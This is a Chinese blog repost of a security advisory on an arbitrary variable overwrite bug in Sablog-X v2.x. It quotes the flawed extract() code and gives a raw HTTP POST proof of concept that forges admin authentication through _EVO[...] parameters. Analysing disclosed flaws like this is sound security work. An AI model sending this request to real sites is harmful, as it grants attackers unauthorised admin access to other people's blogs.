Sablog-X v2.x 任意变量覆盖漏洞

最新推荐文章于 2020-04-30 00:59:00 发布
最新推荐文章于 2020-04-30 00:59:00 发布
阅读量297 收藏
点赞数
分类专栏: 黑客攻防 文章标签: PHP SQL Server SQL Windows 
Sablog-X v2.x 任意变量覆盖漏洞

author: 80vul-B
team:http://www.80vul.com

一 描叙:

由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。


二 分析

common.inc.php代码里:

....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
	@extract($_COOKIE, EXTR_SKIP);
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
...
	if ($_EVO = $DB->fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里,如果这个if条件不满足,将跳过这个初始化过程。
...
}
if(!$sessionexists) {
	if($sax_uid) {
		if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
...
@extract($_EVO); //覆盖任意变量

由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)

三 利用

下面给个后台权限欺骗的PoC:

POST http://127.0.0.1/sax/cp.php  HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close

_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=111111111111


四 补丁[fix]

缺
xuehu808
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SaBlog v2.6 伪静态链接版
07-10
本静态链接版是修改自SaBlog 2.6 Build 0423<br> 对SaBlog修改内容如下: <br> <br> 修改index.php/global.php文件以适应静态链接 <br> 修改templatedefault下模板文件,以便适应静态链接要求 <br> 增加archiveslog.php、archives\_blog.php、archivesindex.php做为静态Blog文件、静态Index文件的模板 <br> 修改attachment.php、增加archivesattachment.php以满足实现在伪静态页面中下载 <br> 修改rss.php以产生RSS的静态链接地址 <br> 修改blog.php、增加adminmkstatic.php以生成静态的Blog/Index文件 <br> 增加adminupload.php,以便无文件也能上传附件* <br> 增加attachmentsimage目录以便存储上传的图像文件,同时增加0字节的attachmentsindex.htm 修改adminindex.php,以增加上传文件、更新Blog静态页面的链接
sablog 1.6
08-12
为了下个东西,就把这个放上了 还是个不错的东西
Sablog-X v2.0 build 20120305.rar
07-16
Sablog-X是一个采用PHP和MySQL构建的博客系统.作为Sablog的后继产品,Sablog-X在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在原有的基础上,更上一层楼.凭借Sablog-X作者7年多的安全技术经验,4年的PHP开发经验,强于创新,追求完美的设计理念,使得Sablog-X已获得业内越来越多专家和用户的认可.   20120305作者语: 发布这一刻,我突然觉得2.0仅仅比1.6人性化一点,好用一点,数据结构科学一点。其实进步似乎不是太多。只是为了实现自己曾经吹过的牛B。硬着头皮发布了。 此版本距上一版本跨度比较大,修改了附件上传的方式、评论嵌套等等。 废除了普通的上传附件的方式,采用SWF的上传,可以多选文件。普通的POST上传代码还留着。非常乱。但是已经是没效果了的。 Sablog非官方群(29590967),如果有BUG,大家可以在群里和我说。或者给我发邮件。或者留下评论。 里面有1.6到2.0的升级程序。
2年工作经验杂谈(java开发)
Mars
09-02 4665
前言 个人介绍 本人不是985/211,普通本科,通信专业,成绩挺好不是最拔尖算得上中等偏上,好吧我觉得可能是上吧,党员。 在毕业后在厦门一家公司实习后加入工作,工资中等,公司规模300-500,团队8-30人。 与理想的薪资待遇有偏差,当然自己的能力有偏差。 两年来工作路线 入职小白-》 高效下手-》 初级程序员-》 核心研发、中级-》 技术组长、技术主管(短暂) 两年来学习路线...
变量覆盖漏洞总结
qq_45521281的博客
04-30 3069
什么是变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:**$$**使用不当,**extract()**函数使用不当,**parse_str()**函数使用不当,**import_request_variables()**使用不当,开启了全局变量注册等。 几种变量覆盖漏洞 全局变量覆盖 register_globals的意思就是注册为全局变量,所以当为O...
sablog-x1.6.rar_Sablog_adminfunctions.php_sablog x模板
09-21
【标题】"sablog-x1.6.rar"是一个压缩包文件,其中包含了Sablog x1.6版本的模板资源。Sablog是一个流行的开源博客系统,它为个人或团队提供了搭建博客的强大工具。"Sablog_adminfunctions.php"是这个博客系统中的一...
Sablog-X-Plus.zip_sablog-x
09-24
作为Sablog的后继产品,Sablog-X在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在原有的基础上,更上一层楼.凭借Sablog-X作者7年多的安全技术经验,4年的PHP开发经验,强于创新,追求完美的...
博客空间Sablog-X v1.6 正式版 Build 20070820-sablog-x1.6.zip
03-21
博客空间Sablog-X v1.6 正式版 Build 20070820-sablog-x1.6.zip是一款基于PHP语言开发的个人博客系统,它为用户提供了一个功能强大、易于使用的平台来发布自己的思想、见解和生活点滴。这款博客软件在2007年8月20日...
[博客空间]Sablog-X Plus 2.0 Build 090308_sablog-x-plus.zip
03-16
Sablog-X Plus 2.0 Build 090308:一款强大的个人博客系统解析》 Sablog-X Plus 2.0 Build 090308是一款基于PHP开发的开源博客系统,旨在为用户提供高效、稳定、功能丰富的个人博客搭建方案。这款软件在2009年3月...
[博客空间]Sablog-X 2.0 Beta Build 20090803_sablog-x.zip
03-13
【博客空间】Sablog-X 2.0 Beta Build 20090803_sablog-x.zip 本文将详细介绍Sablog-X 2.0 Beta Build 20090803,这是一个用于创建个人博客空间的开源软件。Sablog-X作为一个成熟的博客系统,具有丰富的功能和高度...
分布式电网动态电压恢复器模拟装置设计与实现.doc
最新发布
07-06
本装置采用DC-AC及AC-DC-AC双重结构,前级采用功率因数校正(PFC)电路完成AC-DC变换,改善输入端电网电能质量。后级采用单相全桥逆变加变压器输出的拓扑结构,输出功率50W。整个系统以TI公司的浮点数字信号控制器TMS320F28335为控制电路核心,采用规则采样法和DSP片内ePWM模块功能实现SPWM波,采用DSP片内12位A/D对各模拟信号进行采集检测,简化了系统设计和成本。本装置具有良好的数字显示功能,采用CPLD自行设计驱动的4.3英寸彩色液晶TFT-LCD非常直观地完成了输出信号波形、频谱特性的在线实时显示,以及输入电压、电流、功率,输出电压、电流、功率,效率,频率,相位差,失真度参数的正确显示。本装置具有开机自检、输入电压欠压及输出过流保护,在过流、欠压故障排除后能自动恢复。
【无人机通信】基于matlab Stackelberg算法无人机边缘计算抗干扰信道分配【含Matlab源码 4957期】.mp4
07-06
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
电网公司数字化转型规划与实践两个文件.pptx
07-05
电网公司数字化转型规划与实践两个文件.pptx
React Native Ruby 前后端分离系统案例介绍文档
07-06
React Native Ruby 前后端分离系统案例介绍文档
http请求方法.docx
07-06
HTTP(Hypertext Transfer Protocol)定义了一些常见的请求方法(也称为动词或谓词),用于指示对服务器执行的操作类型。以下是常见的 HTTP 请求方法: GET:从服务器获取资源。GET 方法的请求参数一般附在 URL 后面,通过问号传参形式传递。 POST:向服务器提交数据,常用于提交表单或上传文件等操作。POST 方法的请求参数一般包含在请求体中。 PUT:向服务器发送数据,用来创建或更新资源。通常用于更新整个资源,但不限于此。 DELETE:请求服务器删除指定的资源。 HEAD:类似于 GET 方法,但服务器只返回响应头部,不返回实际内容。主要用于获取资源的元信息。 PATCH:部分更新资源,用来对资源进行局部修改。 OPTIONS:获取目标资源所支持的通信选项,常用于跨域请求的预检。 TRACE:回显服务器收到的请求,主要用于测试或诊断。 CONNECT:HTTP/1.1 协议中预留给能够将连接改为管道方式的代理服务器。 这些方法定义了客户端与服务器之间的交互方式,每种方法都有特定的语义和使用场景。在实际开发中,选择合适的方法非常重
ROS的一些基本概念和语法介绍 ROS提供了丰富的工具和库,用于构建复杂的机器人应用.docx
07-06
ROS的一些基本概念和语法介绍。ROS提供了丰富的工具和库,用于构建复杂的机器人应用.docx
利达余压调试软件说明书
07-05
利达余压调试软件说明书,介绍利达旗下品牌的余压系统调试软件的使用方法
0777权限无法删除
09-01
- *2* [Sablog-X博客程序 v1.5 正式版](https://download.csdn.net/download/weixin_38642864/16075486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值